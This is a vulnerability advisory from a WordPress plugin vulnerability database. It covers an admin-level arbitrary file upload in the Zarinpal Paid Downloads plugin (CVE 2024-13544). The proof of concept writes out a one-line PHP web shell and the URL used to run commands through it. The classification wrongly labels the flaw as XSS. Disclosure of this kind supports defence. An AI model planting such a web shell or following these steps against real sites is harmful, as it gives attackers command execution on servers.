Zarinpal Paid Downloads <= 2.3 – Admin+ Arbitrary File Upload | CVE 2024-13544 | Plugin Vulnerabilities

Description

The plugin does not properly validate uploaded files, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)

Proof of Concept

1. Go to https://example.com/wp-admin/admin.php?page=paid-downloads-files
2. Upload a file named `cmd.php` containing `<?php echo system($_GET['cmd']); ?>`
3. Access the file at `https://example.com/wp-content/uploads/paid-downloads/files/cmd.php?cmd=ps`

Affects Plugins

zarinpal-paid-downloads

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

91884263-62a7-436e-b19f-682b1aeb37d6

Timeline

Publicly Published

2025-01-21 (about 11 months ago)

Added

2025-01-21 (about 11 months ago)

Last Updated

2025-01-21 (about 11 months ago)

Other

Published

Title

Published

2024-10-21

Title

myCred Elementor < 1.2.7 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2021-08-23

Title

Gallery Blocks with Lightbox < 2.2.1 - Authenticated Stored Cross-Site Scripting

Published

2024-12-30

Title

Premium Blocks – Gutenberg Blocks for WordPress < 2.1.43 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-12

Title

WPC Smart Quick View for WooCommerce < 4.0.3 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2023-01-19

Title

User Meta Manager <= 3.4.9 - Reflected XSS